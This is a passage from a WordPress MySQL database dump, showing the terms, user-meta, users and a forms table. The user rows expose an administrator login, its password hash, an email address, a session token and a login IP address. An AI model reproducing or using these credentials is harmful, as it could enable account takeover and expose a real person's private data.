  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_termmeta`
--

LOCK TABLES `wpcn_termmeta` WRITE;
/*!40000 ALTER TABLE `wpcn_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcn_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_terms`
--

DROP TABLE IF EXISTS `wpcn_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_terms`
--

LOCK TABLES `wpcn_terms` WRITE;
/*!40000 ALTER TABLE `wpcn_terms` DISABLE KEYS */;
INSERT INTO `wpcn_terms` VALUES (1,'Uncategorized','uncategorized',0);
/*!40000 ALTER TABLE `wpcn_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_usermeta`
--

DROP TABLE IF EXISTS `wpcn_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_usermeta`
--

LOCK TABLES `wpcn_usermeta` WRITE;
/*!40000 ALTER TABLE `wpcn_usermeta` DISABLE KEYS */;
INSERT INTO `wpcn_usermeta` VALUES (1,1,'nickname','ashbyadmin'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpcn_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpcn_user_level','10'),(14,1,'dismissed_wp_pointers',''),(15,1,'show_welcome_panel','1'),(16,1,'session_tokens','a:1:{s:64:\"1288c6061cd4dc9067b3b329472c9748c816457c3c024532ea72746a34a4717d\";a:4:{s:10:\"expiration\";i:1520556116;s:2:\"ip\";s:13:\"47.203.137.20\";s:2:\"ua\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0\";s:5:\"login\";i:1520383316;}}'),(17,1,'wpcn_dashboard_quick_press_last_post_id','3'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"47.203.137.0\";}');
/*!40000 ALTER TABLE `wpcn_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_users`
--

DROP TABLE IF EXISTS `wpcn_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_users`
--

LOCK TABLES `wpcn_users` WRITE;
/*!40000 ALTER TABLE `wpcn_users` DISABLE KEYS */;
INSERT INTO `wpcn_users` VALUES (1,'ashbyadmin','$P$BRs7S2AshlNpryMQZemnyP9HPIZVl11','ashbyadmin','dbc@expcom.com','','2018-03-07 00:41:39','',0,'ashbyadmin');
/*!40000 ALTER TABLE `wpcn_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpcn_wpforms_lite`
--

DROP TABLE IF EXISTS `wpcn_wpforms_lite`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpcn_wpforms_lite` (
  `rid` int(10) NOT NULL AUTO_INCREMENT,
  `start` bigint(20) NOT NULL,
  `end` bigint(20) NOT NULL,
  `status` tinyint(2) NOT NULL DEFAULT 1,
  `date` int(10) NOT NULL,
  PRIMARY KEY (`rid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcn_wpforms_lite`
--

LOCK TABLES `wpcn_wpforms_lite` WRITE;
/*!40000 ALTER TABLE `wpcn_wpforms_lite` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcn_wpforms_lite` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-11-16 11:49:52
